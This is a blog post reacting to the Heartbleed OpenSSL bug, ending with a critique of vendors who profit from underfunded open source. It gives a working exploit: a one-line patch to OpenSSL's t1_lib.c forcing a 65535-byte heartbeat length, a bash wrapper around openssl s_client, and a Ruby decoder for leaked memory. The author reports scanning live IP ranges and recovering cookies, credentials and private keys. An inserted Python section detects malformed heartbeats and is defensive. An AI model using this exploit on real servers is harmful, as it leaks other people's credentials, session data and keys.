Dear Hackers: You Win

I must admit I’m writing a Heartbleed post mostly because I feel obligated. In case you’ve been living under a rock for the last week, Heartbleed is the name given to a critical information disclosure flaw in OpenSSL. It allows you to read some pretty neat stuff out of server memory. My anti-sec split personality wants to believe that this is awesome, but unfortunately I do have a day job. And let me tell you, this sucked a lot.

I first learned of the bug in the afternoon of Monday April 7th. I immediately downloaded the source tree for OpenSSL 1.0.2-beta1. To exploit the issue, I only had to edit one line of code:

In t1_lib.c, line 3907, change to:

s2n(65535, p);

Done.  Just run ./config and make. That’s it.
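The one-line change above works because an unpatched server trusts the payload length claimed inside the heartbeat message instead of checking it against the size of the TLS record that carried it. The fix adds exactly that bounds check. The following Python is an added example, not code from the original post: it parses a TLS heartbeat record, applies the same check (type byte, length field, claimed payload and at least 16 bytes of padding must all fit in the record), and reports malformed heartbeats so a sensor or log pipeline can flag them. The two sample records and the helper names are constructed for this example.

```python
"""Bounds-check the length field of TLS heartbeat messages.

Added example, not code from the original post. The check mirrors the one
the Heartbleed fix added to OpenSSL: the payload length claimed inside a
heartbeat must fit in the enclosing TLS record together with the 1-byte
heartbeat type, the 2-byte length field and at least 16 bytes of padding.
A patched server discards a record that fails this check; the same test
lets a sensor flag malformed heartbeats in captured traffic.
"""
import struct

TLS_CONTENT_HEARTBEAT = 0x18
HB_REQUEST, HB_RESPONSE = 1, 2
HB_MIN_PADDING = 16

# Constructed sample records (not captured traffic).
# Well-formed request: claims 4 payload bytes ("ping") and carries them plus 16 bytes of padding.
BENIGN_RECORD = b"\x18\x03\x02\x00\x17" + b"\x01\x00\x04" + b"ping" + b"\x00" * 16
# Malformed request: claims 65535 payload bytes but the record carries none.
MALFORMED_RECORD = b"\x18\x03\x02\x00\x03" + b"\x01\xff\xff"


def check_heartbeat_record(record: bytes) -> dict:
    """Parse one TLS record and report whether the heartbeat inside it is well formed.

    Returns a dict with 'ok' (bool) and 'reason' (str); when the heartbeat header
    could be parsed it also carries 'claimed' (payload length in the message) and
    'carried' (payload plus padding bytes actually present in the record).
    """
    if len(record) < 5:
        return {"ok": False, "reason": "record shorter than TLS header"}
    content_type, _version, rec_len = struct.unpack("!BHH", record[:5])
    if content_type != TLS_CONTENT_HEARTBEAT:
        return {"ok": False, "reason": "not a heartbeat record"}
    body = record[5:5 + rec_len]
    if len(body) != rec_len:
        return {"ok": False, "reason": "record length exceeds bytes on the wire"}
    if rec_len < 3:
        return {"ok": False, "reason": "heartbeat body shorter than type and length fields"}
    hb_type, claimed = struct.unpack("!BH", body[:3])
    if hb_type not in (HB_REQUEST, HB_RESPONSE):
        return {"ok": False, "reason": "unknown heartbeat type"}
    carried = rec_len - 3
    # The check the fix added: type (1) + length (2) + payload + min padding (16)
    # must not exceed the record length, otherwise the echo would read past the
    # received data and return whatever else sits in memory.
    if 1 + 2 + claimed + HB_MIN_PADDING > rec_len:
        return {"ok": False, "reason": "claimed payload length exceeds record",
                "claimed": claimed, "carried": carried}
    return {"ok": True, "reason": "well-formed heartbeat",
            "claimed": claimed, "carried": carried}


def iter_tls_records(stream: bytes):
    """Split a byte stream into TLS records using the 5-byte record headers."""
    off = 0
    while off + 5 <= len(stream):
        rec_len = struct.unpack("!H", stream[off + 3:off + 5])[0]
        yield stream[off:off + 5 + rec_len]
        off += 5 + rec_len


def find_malformed_heartbeats(stream: bytes) -> list:
    """Return the check result for every heartbeat record in the stream that fails the bounds check."""
    findings = []
    for record in iter_tls_records(stream):
        if record[0] != TLS_CONTENT_HEARTBEAT:
            continue  # handshake, alert and application data records are not inspected here
        result = check_heartbeat_record(record)
        if not result["ok"]:
            findings.append(result)
    return findings


if __name__ == "__main__":
    for name, rec in (("benign", BENIGN_RECORD), ("malformed", MALFORMED_RECORD)):
        print(name, check_heartbeat_record(rec))
```

Feeding a captured client-to-server stream through find_malformed_heartbeats gives one finding per heartbeat whose claimed length could not have been satisfied by the record, which is the condition a patched server rejects and an unpatched one answers with up to 64 KB of process memory.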

Now I needed an OpenSSL client to send a TLS heartbeat to an affected server. Luckily, OpenSSL comes with a binary called openssl, which supports an operation called s_client.  See the man page for details. I created the following bash script (quick and dirty) called heartbleed.sh as a wrapper for the s_client operation:

#!/bin/bash
# Usage: ./heartbleed.sh <host> <port>
# Run from the root of the patched OpenSSL source tree so that apps/openssl
# is the freshly built binary. The leading "B" line makes s_client send one
# TLS heartbeat; anything typed afterwards is passed through to s_client.
{ echo "B"; cat; } | apps/openssl s_client -tlsextdebug -msg -connect "$1:$2" 2>&1 | ruby heartbleed_decode.rb

Note the use of the “B” character.  Little known fact: sending a “B\n” to the openssl s_client triggers the sending of a TLS heartbeat.  This is enough to exploit the issue.  Still, we need a decoder to convert the hex bytes we receive from the openssl -msg debug output into printable ASCII.

The heartbleed_decode.rb script contains a really rough decoder script:

#!/usr/bin/env ruby
# Reads the -msg debug output of openssl s_client on STDIN. Once the client
# prints HEARTBEATING, every following full 16-byte hex dump line is decoded
# to ASCII, with non-printable bytes shown as '.'.

output = false
STDIN.each_line do |line|
  if output && line =~ /( [0-9a-f]{2}){16}/
    # Turn "18 03 02 ..." into the raw bytes, then mask anything non-printable.
    raw = line.scan(/[0-9a-f]{2}/).map { |hex| hex.hex.chr }.join.force_encoding('BINARY')
    print raw.gsub(/[^[:print:]]/, '.')
  end
  output = true if line =~ /HEARTBEATING/
end

Not great, but it will do the job. It seems to be more reliable and leaks many more bytes than any other PoC code I’ve used.

To test, I ran it in a loop and scanned the public IP blocks of the organization I work for. And then I laughed, gasped, whimpered and cried a little. I found cookies, VPN authentication tokens, user credentials, internal network information, email snippets, private keys, certificates.

If you’re not in the field of information security you may have trouble understanding my mental state at that moment.  Imagine for a second that you’re a doctor. You are working tirelessly to cure cancer. You have invested 40 years of your life in pursuit of this goal — attended a prestigious university, wrote a PhD thesis, published many books — and you are now working at the cutting edge of your field. And then one day, you wake up in the morning to discover that 60% of the people in the world have died from the common cold.

As an industry, I’m not sure where we go from here. Not because we had a bad week, but because it took 2 years to notice this bug. And we can’t blame the person who committed the code or the maintainers of the OpenSSL project.  They’re a small team that receives very little financial support despite their heroic efforts to produce a very complex piece of software. They have many valid reasons for this oversight. But what about the people who use this software — or better yet — make money from this software? To all the network and security appliance manufacturers who have leeched from the open source community for years: What’s your excuse?
